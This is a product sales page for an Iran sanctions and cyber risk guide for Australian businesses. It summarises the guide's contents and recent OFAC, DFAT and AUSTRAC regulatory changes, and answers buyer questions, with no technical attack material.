Home/Products/Iran Sanctions Guide
Geopolitical Risk Guide Last updated: 2026-03-25

Iran Sanctions & Cyber Risk Guide

Sanctions compliance checklist, Iran-linked cyber threat profiles, supply chain risk assessment, and board-level risk briefing templates for Australian businesses.

$47 AUD
Get Instant Access →

30-Day Money-Back Guarantee

Instant download DFAT-aligned Board-ready

What's Included

Comprehensive sanctions and cyber risk toolkit for Australian businesses.

Sanctions Compliance Checklist

Step-by-step checklist to verify your business complies with Australian and international Iran sanctions requirements.

Cyber Threat Profiles

Detailed profiles of Iran-linked threat actors targeting Australian businesses. Know what to look for.

Supply Chain Risk Assessment

Templates to assess your supply chain for Iran-linked exposure. Third-party risk evaluation made practical.

Incident Response for State Actors

What to do if you detect a state-sponsored intrusion. Step-by-step playbook aligned to Australian requirements.

Board-Level Risk Briefing

Ready-to-present risk briefing template. Communicate geopolitical cyber risk to non-technical leadership.

Australian Context

Written for Australian businesses. References DFAT sanctions list, ASD advisories, and local reporting requirements.

Full Contents

Who It's For

Board Members & Directors

Needing to understand and communicate geopolitical cyber risk to stakeholders.

Compliance & Risk Officers

Responsible for sanctions compliance and third-party risk management.

IT & Security Teams

Needing threat intelligence on state-sponsored actors targeting Australian infrastructure.

Businesses with Global Supply Chains

Any organisation with international suppliers, partners, or customers in sensitive regions.

Why This Matters

This is not a static risk. In March 2026, OFAC issued General Licences GL T and GL U — the first substantive relaxation of Iran sanctions since 2018 — while DFAT simultaneously tightened compliance expectations with mandatory 10-year record retention and expanded red-flag typologies. From 31 March 2026, AUSTRAC gains enforcement powers over sanctions-related financial activity. The AFP prosecution of a remittance-company director for transferring $649,000 to sanctioned Iranian banks demonstrates that Australian authorities are actively pursuing criminal charges. Meanwhile, Iran-linked APT groups continue accelerating exploitation of new CVEs with supply-chain compromise campaigns. The regulatory landscape is shifting fast, enforcement is intensifying, and businesses that treat this as a checkbox exercise are exposed. This guide gives you the practical tools to assess your exposure, navigate the OFAC-DFAT compliance tension, and brief your board — all in Australian context with current intelligence.

Latest Intelligence Update — March 2026

OFAC General Licences GL T and GL U (January-March 2026)

OFAC issued two new general licences that directly affect Australian businesses with US nexus. GL T (effective 23 January 2026) authorises limited safety- and environmental-related transactions involving blocked persons or vessels. GL U (effective 20 March 2026) permits the delivery and sale of Iranian petroleum products under tightly defined conditions, marking the first substantive relaxation since the 2018 comprehensive restrictions. Australian firms that maintain USD-denominated accounts, use US-based payment processors, or rely on SWIFT must assess whether their Iran-related activities fall within these narrow licence scopes. Both licences carry a "no-new-business" clause requiring pre-existing authorisation.

DFAT Guidance Overhaul and 10-Year Record Retention

DFAT released revised sanctions guidance introducing stricter red-flag typologies, expanding the scope of entities subject to compliance (including fintech firms and payment-service providers), and mandating a 10-year record-retention obligation for all sanctions-related documentation. This supersedes the previous 5-year standard and applies to exporters, banks, and payment processors. Critically, DFAT's precautionary posture creates a compliance grey area: while OFAC's licences permit limited transactions, DFAT still requires specific permits for activity exceeding licence thresholds, with civil penalties of up to USD $1 million per breach.

AUSTRAC Enforcement Powers (31 March 2026)

From 31 March 2026, AUSTRAC assumes limited enforcement powers over sanctions-related financial activity. This enables direct monitoring and penalties for supply-chain financing involving Iranian counterparts. Australian fintech firms facilitating cross-border payments — including cryptocurrency transactions — face heightened regulatory scrutiny under both AUSTRAC and DFAT frameworks. Businesses should anticipate audits and implement automated screening against the OFAC SDN list.

Active Threat Actors

Iran-linked APT groups are accelerating exploitation of newly disclosed CVEs, with campaigns observed using PowerShell-based execution vectors and supply-chain compromise techniques targeting software-update pipelines. These groups continue to target critical infrastructure, financial services, and government-adjacent organisations in allied nations including Australia. The guide includes updated threat actor profiles, known TTPs, and indicators of compromise.

Cross-Jurisdictional Compliance Tension

A divergence has emerged between OFAC and DFAT interpretations. OFAC's GL T and GL U suggest a limited, case-by-case approach to permitted transactions, while DFAT adopts a more precautionary posture warning that any indirect involvement with Iranian entities may trigger penalties. Multinational corporations operating across both jurisdictions must reconcile these conflicting standards. The guide maps the overlap and provides a decision framework for dual-jurisdiction compliance.

Frequently Asked Questions

Is this guide specific to Australian sanctions law?
Yes. The guide references the DFAT Consolidated List, Australian autonomous sanctions legislation, and ASD cyber threat advisories. It is written for Australian businesses and references local reporting requirements.
Do I need a cybersecurity team to use the threat profiles?
No. The threat profiles are written in plain language for risk and compliance professionals. Technical indicators are included for IT teams, but the strategic overview is accessible to non-technical leadership and board members.
How current is the threat intelligence?
The guide covers established Iran-linked threat actor groups and their known tactics, techniques, and procedures. It is based on publicly available intelligence from ASD, CISA, and reputable threat intelligence sources. Purchasers receive updates when significant changes occur.
Can I present the board briefing template directly to directors?
Yes. The board-level risk briefing template is designed to be presentation-ready. It communicates geopolitical cyber risk in business terms, not technical jargon, and includes recommended actions for governance teams.
What are the latest Iran sanctions enforcement actions in Australia?
The guide covers the AFP prosecution of a remittance-company director charged with transferring approximately $649,000 to sanctioned Iranian banks. This case demonstrates that Australian authorities are actively enforcing sanctions violations with criminal charges. The guide analyses this case and its implications for compliance obligations under Australian autonomous sanctions legislation.
Does the guide cover Iran-linked cyber threat groups?
Yes. The guide includes detailed profiles of Iran-linked APT groups, their tactics, techniques, and procedures (TTPs), and known indicators of compromise. Coverage includes PowerShell-based execution vectors, CVE exploitation patterns, and supply-chain compromise campaigns targeting software-update pipelines. Profiles are written for both technical and non-technical audiences.
How do the new OFAC General Licences GL T and GL U affect Australian businesses?
GL T (effective January 2026) and GL U (effective March 2026) create narrow pathways for certain Iran-related transactions, but carry strict conditions including a "no-new-business" clause. Australian businesses with USD accounts, US payment processors, or SWIFT exposure must assess whether their activities fall within scope. The guide includes a decision framework for navigating these licences alongside DFAT requirements.
What does AUSTRAC's new enforcement role mean for my business?
From 31 March 2026, AUSTRAC gains limited enforcement powers over sanctions-related financial activity. This means direct monitoring and potential penalties for supply-chain financing involving Iranian counterparts. Fintech firms and payment-service providers face particular scrutiny. The guide covers the compliance steps needed before the enforcement date.
What is the new 10-year record-retention requirement?
DFAT's revised guidance mandates that all sanctions-related documentation be retained for 10 years, up from the previous 5-year standard. This applies to exporters, banks, payment processors, and any entity handling Iran-related transactions. The guide includes a record-retention checklist to help you meet this obligation.
What is the refund policy?
Full 30-day money-back guarantee. If the guide does not meet your needs, email us for a complete refund. No questions asked.

Ready to Assess Your Risk?

One-time purchase. Instant download. Start implementing today.

Get the Guide — $47 AUD →